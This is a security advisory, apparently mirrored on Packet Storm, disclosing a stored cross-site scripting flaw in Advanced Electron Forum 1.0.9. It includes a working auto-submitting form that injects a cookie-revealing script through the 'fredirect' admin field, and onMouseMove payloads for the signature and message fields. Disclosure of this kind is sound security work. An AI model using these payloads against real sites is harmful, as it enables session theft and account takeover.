exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Advanced Electron Forum 1.0.9 Cross Site Scripting

Advanced Electron Forum 1.0.9 Cross Site Scripting
Posted Jan 18, 2016
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Advanced Electron Forum version 1.0.9 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 0250b9c446934a307a41c3825a32a4c76a6f9b4d56f1c8b321dc0509722eb386

Advanced Electron Forum 1.0.9 Cross Site Scripting

Change Mirror Download
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt



Vendor:
=============================
www.anelectron.com/downloads/



Product:
====================================
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.



Vulnerability Type:
===================
Persistent XSS



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

In Admin panel under Edit Boards / General Stuff / General Options

There is an option to sepcify a redirect URL for the forum.

See --> Redirect Forum:
Enter a URL to which this forum will be redirected to.

The redirect input field is vulnerable to a persistent XSS that will be
stored in the MySQL database
and execute attacker supplied client side code each time a victim visits
the following URLs.

http://localhost/AEF(1.0.9)_Install/index.php?

http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1



Exploit code(s):
===============

Persistent XSS

<form id="XSS-DE-PERSISTO" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1"
method="post">
<input type="hidden" name="editmother" value="c1" />
<input type="hidden" name="forder" value="1" />
<input type="hidden" name="fstatus" value="1" />
<input type="hidden" name="fredirect" value='"/><script>alert("XSS
hyp3rlinx \n\n" + document.cookie)</script>' />
<input type="hidden" name="fimage" value="" />
<input type="hidden" name="fname" value="Generals" />
<input type="hidden" name="fdesc" value="hyp3rlinx" />
<input type="hidden" name="ftheme" value="0" />
<input type="hidden" name="frulestitle" value="MAYHEM" />
<input type="hidden" name="frules" value="0" />
<input type="hidden" name="rss" value="10" />
<input type="hidden" name="rss_topic" value="0" />
<input type="hidden" name="member[-1]" value="on" />
<input type="hidden" name="member[0]" value="on" />
<input type="hidden" name="member[3]" value="on" />
<input type="hidden" name="inc_mem_posts" value="on" />
<input type="hidden" name="allow_poll" value="on" />
<input type="hidden" name="allow_html" value="on" />
<input type="hidden" name="mod_posts" value="on" />
<input type="hidden" name="editboard" value="Edit+Forum" />
<script>document.getElementById('XSS-DE-PERSISTO').submit()</script>
</form>



Some other misc XSS(s) under 'Signature' area.


http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=signature
on Anchor link setting
http://"onMouseMove="alert(0)

AND

http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=writepm
email link:
mailto:"onMouseMove="alert(1)



Disclosure Timeline:
=====================================
Vendor Notification: NA
January 17, 2016 : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
================
High



Description:
=================================================================


Request Method(s): [+] POST


Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)


Vulnerable Parameter(s): [+] 'fredirect'

=================================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close